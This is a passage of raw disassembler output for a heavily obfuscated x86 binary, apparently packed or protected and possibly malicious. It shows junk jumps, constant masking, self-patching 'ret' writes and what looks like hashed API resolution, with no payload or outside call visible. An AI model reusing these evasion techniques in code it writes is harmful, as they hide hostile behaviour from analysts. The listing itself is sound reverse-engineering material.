		jmp	loc_445560
; END OF FUNCTION CHUNK	FOR sub_445934

; =============== S U B	R O U T	I N E =======================================



sub_457774	proc near		; CODE XREF: hvvrg7ie:004419E1j
					; sub_45A310+5p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00442C16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447403 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A660 SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		pop	esi
		jnz	loc_44A660

loc_45777F:				; CODE XREF: sub_458374-1504Cj
		mov	eax, [esp+0]
		push	edx
		jmp	loc_447403
sub_457774	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_457788:				; CODE XREF: hvvrg7ie:0043E5B4j
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		push	ebx
		jmp	loc_441F66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B96

loc_457794:				; CODE XREF: sub_440B96:loc_44DE97j
		xchg	edx, [esp+4+var_4]
		jmp	loc_43C271
; END OF FUNCTION CHUNK	FOR sub_440B96
; ---------------------------------------------------------------------------

loc_45779C:				; CODE XREF: hvvrg7ie:0044BC5Fj
		mov	[edx], eax
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_45779E:				; CODE XREF: sub_4544DD:loc_444FBBj
					; hvvrg7ie:00456705j
		call	sub_44D2C6
		call	sub_449D38

loc_4577A8:				; CODE XREF: sub_44191F+63B5j
		jmp	nullsub_276
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4577AD:				; CODE XREF: sub_450AA8-138B1j
		jmp	loc_4517E3
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_4577B2:				; CODE XREF: sub_458095:loc_456E5Aj
		pop	eax
		and	eax, 6303CDCBh
		xor	eax, 82C40E0Eh

loc_4577BF:				; CODE XREF: hvvrg7ie:00454A10j
		sub	eax, 6D9D42A5h
		jnz	loc_43C79E

loc_4577CB:				; CODE XREF: sub_451F50-AF3Aj
		jmp	loc_457855
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DE

loc_4577D0:				; CODE XREF: sub_4421DE+Aj
		jmp	loc_44DBD7
; END OF FUNCTION CHUNK	FOR sub_4421DE
; ---------------------------------------------------------------------------
		pop	eax
		jmp	loc_43C795
; ---------------------------------------------------------------------------

loc_4577DB:				; CODE XREF: hvvrg7ie:loc_43C8D0j
		jl	loc_44B6F7
; START	OF FUNCTION CHUNK FOR sub_44290B

loc_4577E1:				; CODE XREF: sub_44290B+E9Dj
		jmp	loc_43A183
; END OF FUNCTION CHUNK	FOR sub_44290B
; ---------------------------------------------------------------------------
		add	edx, 139BBEDBh
		jmp	loc_44B6EE
; ---------------------------------------------------------------------------

locret_4577F1:				; CODE XREF: hvvrg7ie:00441526j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_4577F2:				; CODE XREF: sub_443375+CFE4j
		jmp	loc_439923
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_4577F7:				; CODE XREF: sub_4540B2-AFDAj
		jmp	loc_45052B
; END OF FUNCTION CHUNK	FOR sub_4540B2
; ---------------------------------------------------------------------------

loc_4577FC:				; CODE XREF: hvvrg7ie:0045036Aj
		cmp	al, 0A4h
		jz	loc_44D945
		jmp	loc_45B20C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454451

loc_457809:				; CODE XREF: sub_454451+7j
		xchg	esi, [esp+0]
		push	0F4106B9Bh
		pop	eax
		xor	eax, 9897A640h
		jnz	loc_458D07
; END OF FUNCTION CHUNK	FOR sub_454451
; START	OF FUNCTION CHUNK FOR sub_443358

loc_45781E:				; CODE XREF: sub_443358+3j
		jmp	sub_44612F
; END OF FUNCTION CHUNK	FOR sub_443358
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_457823:				; CODE XREF: sub_43EF3E:loc_43ED54j
		push	eax
		ror	eax, 3
		jmp	loc_445D14
; END OF FUNCTION CHUNK	FOR sub_43EF3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_45782C:				; CODE XREF: sub_458706j
		push	eax
		mov	eax, ebp
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		jmp	loc_447FB0
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------

loc_457839:				; CODE XREF: hvvrg7ie:00458D02j
		push	edx
		push	esi
		push	6949E10Fh
		pop	esi
		sub	esi, 0D1F67E11h
		add	esi, 68F1857Dh
		xchg	esi, [esp]
; START	OF FUNCTION CHUNK FOR sub_44CF7D

loc_457850:				; CODE XREF: sub_44CF7D:loc_455948j
		jmp	sub_458D36
; END OF FUNCTION CHUNK	FOR sub_44CF7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_457855:				; CODE XREF: sub_458095:loc_4577CBj
		jnz	loc_43F3C7
		mov	eax, [ebp-8]
		shl	eax, 3
		add	[ebp-8], eax
		mov	eax, [ebp-8]

loc_457867:				; CODE XREF: sub_451F50-AF45j
		shr	eax, 0Bh
		xor	[ebp-8], eax
; END OF FUNCTION CHUNK	FOR sub_458095
; START	OF FUNCTION CHUNK FOR sub_445934

loc_45786D:				; CODE XREF: sub_445934-A363j
		mov	eax, [ebp-8]
		jmp	loc_43BE08
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_457875:				; CODE XREF: sub_45889B:loc_44CEDAj
		jz	loc_4506F0
		jmp	loc_45448B
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_457880:				; CODE XREF: sub_44D2F8:loc_4487DCj
		jz	loc_443DE9
		jmp	loc_43E4D2
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		mov	eax, 469EF90Dh
		call	sub_450C5A
		mov	ds:dword_41D178, eax
		lea	eax, nullsub_8
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_8
; ---------------------------------------------------------------------------
		xchg	edi, [esp]
		mov	edx, edi
		jmp	loc_449E41
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_263. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_4578B4:				; CODE XREF: sub_4544DD-1B2F1j
		jmp	loc_452097
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
		db 8Ch,	88h, 4Ah
dword_4578BC	dd 0			; DATA XREF: sub_43BD8F+4o
					; sub_4544DD+Co ...
dword_4578C0	dd 153940h		; DATA XREF: sub_4427B2+6r
					; sub_4544DD-F529r ...
; ---------------------------------------------------------------------------

loc_4578C4:				; CODE XREF: hvvrg7ie:00457E45j
		jmp	sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_4578C9:				; CODE XREF: hvvrg7ie:0043E0DFj
					; sub_44CEC8:loc_455AF9j
		jmp	nullsub_418
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
		db 83h,	0C1h
off_4578D0	dd offset dword_41D000	; DATA XREF: hvvrg7ie:loc_43DF14o
					; sub_456CD4:loc_44286Do
		dd 13h,	50h, 5Bh, 170h,	1, 8, 5, 18h, 1, 8, 9, 28h, 3
		dd 10h,	19h, 2 dup(0)
dword_457918	dd 1070000h, 471051C1h,	0FFFF8010h, 0Bh, 0FFFF8010h, 1Fh
					; DATA XREF: hvvrg7ie:0043DF1Co
					; sub_456CD4-1445Fo
		dd 0FFFF8010h, 18h, 0FFFF8010h,	29h, 0FFFF8010h, 4Bh, 0FFFF801Fh
		dd 17h,	0FFFF801Fh, 33h, 0FFFF801Fh, 13h, 0FFFF801Fh, 65h
		dd 0FFFF801Fh, 0Dh, 0FFFF801Fh,	1, 0FFFF801Fh, 6, 0FFFF801Fh
		dd 4, 0FFFF801Fh, 74h, 0FFFF801Fh, 34h,	0FFFF801Fh, 14h
		dd 0FFFF801Fh, 15h, 0FFFF801Fh,	0Fh, 0FFFF801Fh, 12h, 0FFFF801Fh
		dd 11h,	0FFFF801Fh, 0Ch, 0FFFF801Fh, 97h, 0FFFF801Fh, 0Bh
		dd 0FFFF801Fh, 0Ah, 0FFFF801Fh,	10h, 0FFFF801Fh, 9, 0FFFF801Fh
		dd 73h,	0FFFF801Fh, 5, 0FFFF801Fh, 2, 0FFFF801Fh, 3, 9A002Eh
		dd 801D01A0h, 93002Eh, 609D577Dh, 92002Eh, 0B24C760Ah
		dd 6003Eh, 2092F37Fh, 773D0000h, 314542D4h, 0C5466626h
		dd 638DC8h, 1F7B0000h, 0D04811D3h, 0C82EC833h, 8D1Bh, 0D571AB00h
		dd 99BE6435h, 1B64C523h, 63h, 94D57620h, 452729E4h, 1B8C712Ah
		dd 8Dh,	415371B2h, 3632B852h, 0E955001Bh, 0FFFE36DEh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_457A80:				; CODE XREF: sub_44CEC8:loc_44DACBj
		rol	ebx, 15h
		add	ebx, 66CC917Ah
		add	eax, ebx
		pop	ebx
		jmp	loc_44F6DB
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------

loc_457A91:				; CODE XREF: hvvrg7ie:004412ABj
		add	ebp, 0DC4720EAh

; =============== S U B	R O U T	I N E =======================================



sub_457A97	proc near		; CODE XREF: sub_457A97-8457p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043A536 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440FF5 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004463CE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004488D0 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C614 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F634 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451067 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454FFC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455060 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045679D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457AA3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045864A SIZE 00000005 BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		mov	byte ptr [eax],	0C3h
		jmp	loc_43A536
sub_457A97	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_457AA3:				; CODE XREF: sub_457A97:loc_451067j
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	ebp
		mov	ebp, edx
		jmp	loc_4488D0
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_457AAF:				; CODE XREF: sub_4414F6:loc_43A170j
		nop
		mov	eax, 23829242h
		call	sub_43A3C2

loc_457ABA:				; CODE XREF: sub_4585A5+Ej
		jmp	loc_439562
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447744

loc_457ABF:				; CODE XREF: sub_447744+10j
		jmp	loc_43B347
; END OF FUNCTION CHUNK	FOR sub_447744
; ---------------------------------------------------------------------------
		mov	edx, 20413B0Fh
		push	offset sub_44FC5C
		jmp	loc_44E490
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4551D4

loc_457AD3:				; CODE XREF: sub_4551D4:loc_4390AEj
		xchg	ecx, [esp+8+var_8]
		push	edx
		push	offset loc_44995F
		jmp	loc_45B1F0
; END OF FUNCTION CHUNK	FOR sub_4551D4
; ---------------------------------------------------------------------------
		mov	eax, 475BA966h
		call	sub_44059F
		mov	ds:off_41D01C, eax
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_457AF1:				; CODE XREF: sub_43B7B9:loc_451F37j
		lea	eax, loc_43D208
		jmp	loc_4397D3
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45943A

loc_457AFC:				; CODE XREF: sub_45943A-1F873j
		ja	loc_452145
		cdq
		ror	edi, 1Ch
		not	esi
		jmp	loc_44DB3F
; END OF FUNCTION CHUNK	FOR sub_45943A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_457B0D:				; CODE XREF: sub_43E128+18E6Cj
		sub	ecx, 0F2993F52h
		jmp	loc_44BD68
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_457B18:				; CODE XREF: sub_4465A6:loc_454B9Dj
		jz	loc_439AA3
		sbb	edi, ebp
		jnz	loc_450EC3
		jmp	loc_44786E
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_44036A
; ---------------------------------------------------------------------------
		mov	ds:off_41D0B4, eax
		lea	eax, loc_4511D0
		mov	byte ptr [eax],	0C3h
		jmp	loc_4511D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FC5

loc_457B45:				; CODE XREF: sub_446FC5:loc_4511D0j
		pop	edx
		jmp	loc_43A531
; END OF FUNCTION CHUNK	FOR sub_446FC5
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
dword_457B4C	dd 77DD0000h		; DATA XREF: sub_44A6D7-E357w
					; sub_44D7C0+4r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45717D

loc_457B50:				; CODE XREF: sub_45717D+14F7j
		jmp	nullsub_317
; END OF FUNCTION CHUNK	FOR sub_45717D
; ---------------------------------------------------------------------------
		db 62h,	9Ah, 0A0h
; ---------------------------------------------------------------------------

loc_457B58:				; DATA XREF: sub_44059F:loc_458325o
					; sub_458095+3200o
		push	eax
		and	bl, [ecx+14h]
		adc	byte ptr [edx-34h], 91h
		mov	eax, 8D6323h
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_457B65:				; CODE XREF: sub_446EC2-E8Ej
		jmp	nullsub_282
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_457B6A:				; CODE XREF: sub_446E8C-317Cj
		jmp	loc_457CC6
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
		jno	loc_44DB68
		jmp	loc_448888
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_43CA70
; ---------------------------------------------------------------------------

loc_457B80:				; CODE XREF: hvvrg7ie:0044A2C5j
		jge	loc_43D1EB
		jl	loc_4457D9

; =============== S U B	R O U T	I N E =======================================



sub_457B8C	proc near		; CODE XREF: hvvrg7ie:0045707Cp

; FUNCTION CHUNK AT 004553AB SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		lea	eax, sub_4408AE
		mov	byte ptr [eax],	0C3h
		jmp	loc_4553AB
sub_457B8C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_457B9E:				; CODE XREF: sub_4408AE+1j
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_447E4C
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_457BA7:				; CODE XREF: sub_43D531-1527j
					; sub_43D531:loc_456643j
		push	7FDB430Ch

loc_457BAC:				; CODE XREF: hvvrg7ie:loc_44BF89j
		pop	eax
		add	eax, 8AAECBCEh
		sub	eax, 0C01FCE0Ah
		xor	eax, 4A6A40B3h
		jmp	loc_444016
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
		jnb	loc_446B08
		jmp	sub_44E0C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CCA

loc_457BCF:				; CODE XREF: sub_448CCA:loc_4415FCj
		mov	eax, [esp+0]
		push	edx
		push	edx
		push	8C47ED70h
		pop	edx
		xor	edx, 939BC602h
		or	edx, 783F991Ch
		jmp	loc_45857B
; END OF FUNCTION CHUNK	FOR sub_448CCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE37

loc_457BEB:				; CODE XREF: sub_44AE37:loc_44AD66j
		push	9664C0D2h
		pop	ebx
		and	ebx, 7C9E0658h
		sub	ebx, 3C087462h
		cmp	ebx, 0EA97FE1Fh
		jmp	loc_4426AA
; END OF FUNCTION CHUNK	FOR sub_44AE37

; =============== S U B	R O U T	I N E =======================================



sub_457C08	proc near		; CODE XREF: hvvrg7ie:0043C901p
					; hvvrg7ie:00443150j
		xchg	esi, [esp+0]
		pop	esi
		popf
		cmp	dword ptr [eax+10h], 0
		jz	nullsub_514
		jmp	loc_458AF7
sub_457C08	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_457C1C:				; CODE XREF: sub_4500FA+2687j
		mov	[ebx], eax
		pop	ebx
		lea	eax, sub_44713B
		mov	byte ptr [eax],	0C3h
		jmp	sub_44713B
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459E78

loc_457C2D:				; CODE XREF: sub_459E78+4j
		mov	eax, [esp+0]
		push	edx
		jmp	loc_44A1E7
; END OF FUNCTION CHUNK	FOR sub_459E78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E84

loc_457C36:				; CODE XREF: sub_443E84:loc_45B3C3j
		add	eax, edi
		pop	edi
		mov	eax, [eax]
		push	offset loc_43A99D
		jmp	nullsub_461
; END OF FUNCTION CHUNK	FOR sub_443E84
; ---------------------------------------------------------------------------

loc_457C45:				; CODE XREF: hvvrg7ie:0045B3AEj
		xor	ebx, 0B815021Eh
		adc	edx, 0C05BA066h

loc_457C51:				; CODE XREF: hvvrg7ie:loc_439D06j
		sub	esi, 79348E67h
		add	esi, 1D6EE49Bh
		rol	esi, 1Bh
		add	esi, 859741DBh
		mov	[esi], eax
		xchg	eax, [esp]
		jmp	loc_456CA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA83

loc_457C70:				; CODE XREF: sub_43FA83-1089j
		mov	eax, [eax]
		mov	esp, ebp
		pop	ebp
		retn	8
; END OF FUNCTION CHUNK	FOR sub_43FA83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_457C78:				; CODE XREF: sub_450F97-B9C4j
		jmp	nullsub_285
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439A6C

loc_457C7D:				; CODE XREF: sub_439A6C+7j
		jmp	loc_443270
; END OF FUNCTION CHUNK	FOR sub_439A6C

; =============== S U B	R O U T	I N E =======================================



sub_457C82	proc near		; CODE XREF: sub_43B8A5+4p
					; sub_4450D8-736Bj ...
		call	sub_44352A

loc_457C87:				; CODE XREF: sub_456335+Ej
		jmp	sub_43BF23
sub_457C82	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_457C8C:				; CODE XREF: sub_449CC8-EE1Dj
		jmp	loc_45273F
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------

loc_457C91:				; CODE XREF: hvvrg7ie:00453ACAj
		cmp	esi, 0DF71EBF1h
		jmp	loc_44F7F7
; ---------------------------------------------------------------------------

loc_457C9C:				; CODE XREF: hvvrg7ie:0044CB9Aj
		sub	esi, 25E37A10h
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_457CA2:				; CODE XREF: sub_43A839:loc_44CB7Aj
		sub	eax, 15823317h
		add	eax, 321E924Eh
		call	sub_44CC1E
; END OF FUNCTION CHUNK	FOR sub_43A839
; START	OF FUNCTION CHUNK FOR sub_44C91C

loc_457CB3:				; CODE XREF: sub_44C91C+7j
		jmp	loc_44D806
; END OF FUNCTION CHUNK	FOR sub_44C91C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_457CB8:				; CODE XREF: sub_4408AE:loc_457659j
		jz	loc_44F451
		rol	esi, 1Bh
		jmp	loc_44F445
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_457CC6:				; CODE XREF: sub_446E8C:loc_457B6Aj
		cmp	al, 0A4h
		jz	loc_444BA3
		jmp	loc_44058C
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_457CD3:				; CODE XREF: sub_44E3B3-C5A6j
		jno	loc_4563C1
		mov	ecx, 0A50AE32Bh
		jmp	loc_45A686
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
		xor	esi, ecx
		jmp	sub_453D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_457CEA:				; CODE XREF: sub_43E128+EC16j
		cmp	esi, 52ED3AB2h
		jmp	loc_44821A
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_457CF5:				; CODE XREF: hvvrg7ie:0044CBBEj
		jl	loc_4446B3
; START	OF FUNCTION CHUNK FOR sub_448100

loc_457CFB:				; CODE XREF: sub_448100-EE7Fj
		jmp	loc_447AB5
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
		add	ebp, eax
		shr	edx, 5
		or	ebx, edx
		jmp	loc_4446B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_457D0C:				; CODE XREF: sub_455ACA:loc_45AE09j
		sbb	ebp, 0C9FDFDCCh
		jmp	loc_455875
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437CA

loc_457D17:				; CODE XREF: sub_4437CA-11B5j
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C17A
; END OF FUNCTION CHUNK	FOR sub_4437CA
; ---------------------------------------------------------------------------
		pop	edx
		call	sub_44261C
; START	OF FUNCTION CHUNK FOR sub_44AE42

loc_457D25:				; CODE XREF: sub_44AE42+D970j
		jmp	sub_448881
; END OF FUNCTION CHUNK	FOR sub_44AE42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_457D2A:				; CODE XREF: hvvrg7ie:loc_43E7BEj
					; sub_44191F:loc_4569A3j ...
		and	eax, 0B4491B68h
		add	eax, 0B3CC145Ah
		push	ebx
		pushf
		jmp	loc_43D699
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_457D3D:				; CODE XREF: sub_450246-3102j
		xor	edi, 4B21AC36h
		jmp	loc_45649D
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_457D48:				; CODE XREF: sub_44D2F8:loc_44BB8Cj
		cdq
		mov	[ebx], edx
		jmp	loc_452834
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		xor	ecx, 0FEB5111Ah
		jmp	sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D140

loc_457D5B:				; CODE XREF: sub_43D140:loc_44317Bj
		add	edx, 0A8A6A5h
		xchg	edx, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43D140
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jz	loc_44276B
		mov	eax, [esp]
		push	offset sub_446925
		jmp	locret_451C9A
; ---------------------------------------------------------------------------
		mov	ds:off_41D030, eax
		lea	eax, sub_439E6C
		mov	byte ptr [eax],	0C3h
		jmp	sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_457D91:				; CODE XREF: sub_439E6Cj
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_455751
		mov	eax, 1AABF86Ch
		jmp	loc_458C1E
; END OF FUNCTION CHUNK	FOR sub_439E6C
; ---------------------------------------------------------------------------
		jle	loc_44C151
		jmp	sub_44A0B1
; ---------------------------------------------------------------------------

loc_457DB0:				; CODE XREF: hvvrg7ie:00443CE3j
		jnz	loc_458981
		jmp	loc_44CA16
; ---------------------------------------------------------------------------
		mov	edx, 0FBE905F2h
		shl	ecx, 12h
		jmp	sub_440AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_457DC8:				; CODE XREF: sub_44C2EA:loc_43C548j
		mov	eax, 0C9CC80CFh
		shl	ebx, 1Ah
		jmp	loc_44F5A2
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_457DD5:				; CODE XREF: sub_4414D3+56ECj
		or	esi, edi
		and	ebp, 36B772AAh
		or	esi, ebp

loc_457DDF:				; CODE XREF: sub_4414D3:loc_447A06j
		call	sub_44DE0A
		push	0A5F45EB2h
		pop	edx
		and	edx, 0E00683ADh
		add	edx, 0F0D7F15h
; END OF FUNCTION CHUNK	FOR sub_4414D3
; START	OF FUNCTION CHUNK FOR sub_454099

loc_457DF6:				; CODE XREF: sub_454099:loc_43B1B0j
		jmp	loc_44F240
; END OF FUNCTION CHUNK	FOR sub_454099

; =============== S U B	R O U T	I N E =======================================



sub_457DFB	proc near		; DATA XREF: sub_45A6E4:loc_454C26o

; FUNCTION CHUNK AT 0044C237 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A183 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		push	edx
		pop	ecx
		pop	edx
		jmp	loc_45A183
sub_457DFB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_457E06:				; CODE XREF: hvvrg7ie:0044FE7Aj
		jge	loc_446878
		jno	loc_444055
		sub	esi, 9141ADCDh
		jmp	loc_446878
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_457E1D:				; CODE XREF: sub_452265:loc_44E444j
		adc	eax, 0EF8DEDC2h
		cdq
		jmp	loc_43A822
; END OF FUNCTION CHUNK	FOR sub_452265
; ---------------------------------------------------------------------------

loc_457E29:				; CODE XREF: hvvrg7ie:loc_45B618j
		xor	edi, 18A0F922h
		add	edi, 7C06240Eh
		and	edi, 21AE750Fh
		add	edi, 0DEA07A99h
		popf
		xchg	edi, [esp]
		jmp	loc_4578C4
; ---------------------------------------------------------------------------

loc_457E4A:				; CODE XREF: hvvrg7ie:004558BBj
		push	ebp
		mov	ebp, esp
		push	eax
		mov	eax, ecx
		xchg	eax, [esp]
		mov	esp, ebp
		pop	ebp
		jmp	loc_442DDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A10

loc_457E5B:				; CODE XREF: hvvrg7ie:004446D4j
					; sub_459A10+Ej
		pop	edx
		or	edx, 4367C28Dh
		xor	edx, 0C34D9067h
		call	sub_446A16
		push	eax
		ror	eax, 0Fh
		mov	ds:dword_458D8C, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_459A10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_457E78:				; CODE XREF: sub_454789+6325j
		jmp	loc_458369
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_457E7D:				; CODE XREF: sub_442F6B+8j
		jmp	loc_448807
; END OF FUNCTION CHUNK	FOR sub_442F6B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_473. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_457E83:				; CODE XREF: sub_455ACA-69j
		jmp	loc_44D538
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_457E88:				; CODE XREF: sub_454099-13147j
		jmp	nullsub_289
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_457E8D:				; CODE XREF: sub_45B9BB:loc_4508F5j
		jnz	loc_454D69
		jmp	loc_45A9E3
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------

loc_457E98:				; CODE XREF: hvvrg7ie:0043F1FBj
		ja	loc_456269
		jmp	loc_441C71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_457EA3:				; CODE XREF: sub_442334:loc_447DBCj
